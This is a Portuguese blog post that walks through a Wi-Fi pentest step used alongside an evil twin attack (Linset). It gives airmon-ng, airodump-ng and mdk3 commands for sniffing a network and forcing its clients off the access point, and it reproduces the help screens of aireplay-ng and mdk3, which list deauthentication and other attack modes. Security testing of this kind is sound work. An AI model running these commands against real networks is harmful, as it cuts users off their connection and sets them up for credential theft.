Nenhum sistema está seguro...

O objetivo deste site é o de gerar conhecimento na área Forense, Jurídica e tecnologica.

domingo, 10 de fevereiro de 2019

Quebra de Wifi - Aireplay VS MDK3

QUEBRA DE WIFI USANDO O EVIL TIWN ATTACK (LINSET)



Este post descreve uma forma simples em usar métodos auxiliares de um Pentest Wifi, isto ao que tange o uso do Linset ou outra aplicação do gênero. Este poste não visa ensinar a usá-lo, restringe-se apenas em demonstrar uma forma auxiliar para manter os clientes do AP (access point - roteador), desconectado. Também não será explanado nenhum comparativo entre o Aireplay ou MDK3. Vale ressaltar que já existe outros métodos de penetração mais eficiente, mas este ainda é adotado pela sua facilidade e por usar as mesmas técnicas do Pineapple Wifi (Alan Turing).

Para este LAB:
  • Workstation VM
  • Wifislax
  • Dois adaptadores Wifi.

SITUAÇÃO:

Em determinado Pentest, foi detectado uma ineficiência no Aireplay e o MDK3, então foi iniciado outra instância na VM rodando o Wifislax, desta vez para verificar se havia dispositivos conectados no Roteador. 

Com duas instâncias VMs rodando o Wifislax (sistema operacional usado para quebra de wifi), use os seguintes comandos:

PRIMEIRO COMANDO:

1 - Digite: airmon-ng start wlan0

Este comando habilita o modo monitor e cria uma interface comumente denomindada de mon0 você verá a seguinte saída:

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy14]
                                (monitor mode enabled on mon0)

Esta saída representa que o seu adaptador usb wifi está em modo monitor, instalado e pronto para uso.

SEGUNDO COMANDO:

Digite este comando: airodump-ng mon0

Este comando é usado como sniff de rede wifi, necessário para conseguir o MAC, o canal e saber se há clientes conectados na rede wifi.

TERCEIRO COMANDO:

Digite este comando: airodump-ng --bssid xx:xx:xx:xx:xx:xx --channel AA --write AABBZZ mon0

X : é o mac do roteador usado para o pentest

AA: é o canal do respectivo roteador.

AABBZZ: é o nome do arquivo de captura, pode ser visualizado pelo wireshark.

Diante dessas informações, é possível usar Aireplay ou MDK3 para forçar a queda dos clientes ativos no roteador sem fio.

Help Aireplay:

Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: aireplay-ng <options> <replay interface>

  Filter options:

      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -u type   : frame control, type    field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -w iswep  : frame control, WEP     bit
      -D        : disable AP detection

  Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen


Além do Aireplay, é possível utilizar o MDK3, particularmente, tenho preferência nele.



MDK3

Considerando a forma sucinta, utilizou-se para o fim que se destina este post o comando abaixo:



mdk3 mon0 d -i XX:XX:XX:XX:XX



Onde o xx é o MAC do roteador em questão.

Após digitar o comando, a sua saída estará da seguinte forma:

Disconnecting between: AA:AA:AA:AA:AA:AA and: AA:AA:AA:AA:AA:AA

Onde o xx é o MAC dos clientes (celulares e dispositivos sem fio conectados ao roteador) em questão.

É possível consulta o seu help logo abaixo:

MDK 3.0 v6 - "Yeah, well, whatever"
by ASPj of k2wrlz, using the osdep library from aircrack-ng
And with lots of help from the great aircrack-ng community:
Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,
telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik
THANK YOU!

MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
IMPORTANT: It is your responsibility to make sure you have permission from the
network owner before running MDK against it.

This code is licenced under the GPLv2

MDK USAGE:
mdk3 <interface> <test_mode> [test_options]

Try mdk3 --fullhelp for all test options
Try mdk3 --help <test_mode> for info about one test only

TEST MODES:
b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
a   - Authentication DoS mode
      Sends authentication frames to all APs found in range.
      Too much clients freeze or reset some APs.
p   - Basic probing and ESSID Bruteforce mode
      Probes AP and check for answer, useful for checking if SSID has
      been correctly decloaked or if AP is in your adaptors sending range
      SSID Bruteforcing is also possible with this test mode.
d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody found from AP
m   - Michael shutdown exploitation (TKIP)
      Cancels all traffic continuously
x   - 802.1X tests
w   - WIDS/WIPS Confusion
      Confuse/Abuse Intrusion Detection and Prevention Systems
f   - MAC filter bruteforce mode
      This test uses a list of known client MAC Adresses and tries to
      authenticate them to the given AP while dynamically changing
      its response timeout for best performance. It currently works only
      on APs who deny an open authentication request properly
g   - WPA Downgrade test
      deauthenticates Stations and APs sending WPA encrypted packets.
      With this test you can check if the sysadmin will try setting his
      network to WEP or disable encryption.

Por fim, atingimos a finalidade deste post.

Nenhum comentário:

Postar um comentário

Observação: somente um membro deste blog pode postar um comentário.

Análise da Vulnerabilidade CVE-2024-23113 no FortiGate

  Relatório Técnico: Análise da Vulnerabilidade CVE-2024-23113 no FortiGate e Medidas de Mitigação Introdução Nos últimos anos, as vulnerabi...